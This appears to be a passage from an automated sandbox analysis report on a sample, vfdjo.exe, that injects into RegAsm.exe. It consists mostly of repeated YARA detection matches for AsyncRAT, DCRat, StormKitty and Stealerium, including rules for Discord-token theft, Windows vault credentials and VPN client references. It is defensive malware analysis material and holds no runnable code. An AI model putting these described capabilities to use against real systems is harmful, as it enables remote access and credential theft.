Source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen

.NET source code contains very large strings

Source: vfdjo.exe, Knvbl.cs

Long String: Length: 14784

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_01343370 NtProtectVirtualMemory,		4_2_01343370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_01342F19 NtProtectVirtualMemory,		4_2_01342F19

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_013427A0	4_2_013427A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_01342792	4_2_01342792
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_01342F19	4_2_01342F19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_06A07460	4_2_06A07460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_06A00040	4_2_06A00040

Source: vfdjo.exe, 00000000.00000002.1723757668.00000000050D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamelvbdqmie.dll4 vs vfdjo.exe
Source: vfdjo.exe, 00000000.00000000.1681774554.00000000008CC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMercado.exe0 vs vfdjo.exe
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamehvnc.exe" vs vfdjo.exe
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientAny.exe" vs vfdjo.exe
Source: vfdjo.exe, 00000000.00000002.1721135012.000000000107E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs vfdjo.exe
Source: vfdjo.exe, 00000000.00000002.1721393679.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientAny.exe" vs vfdjo.exe
Source: vfdjo.exe, 00000000.00000002.1721393679.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientAny.exe" vs vfdjo.exe
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamehvnc.exe" vs vfdjo.exe
Source: vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientAny.exe" vs vfdjo.exe
Source: vfdjo.exe, 00000000.00000002.1721393679.0000000002C99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientAny.exe" vs vfdjo.exe
Source: vfdjo.exe	Binary or memory string: OriginalFilenameMercado.exe0 vs vfdjo.exe

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: dump.pcap, type: PCAP	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: dump.pcap, type: PCAP	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.vfdjo.exe.2c994c2.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.vfdjo.exe.2c9c510.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.vfdjo.exe.2c2a79e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.vfdjo.exe.2c2d204.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.vfdjo.exe.2c994c2.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.vfdjo.exe.2c2d204.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.vfdjo.exe.3fd95f0.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.vfdjo.exe.2c2a79e.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

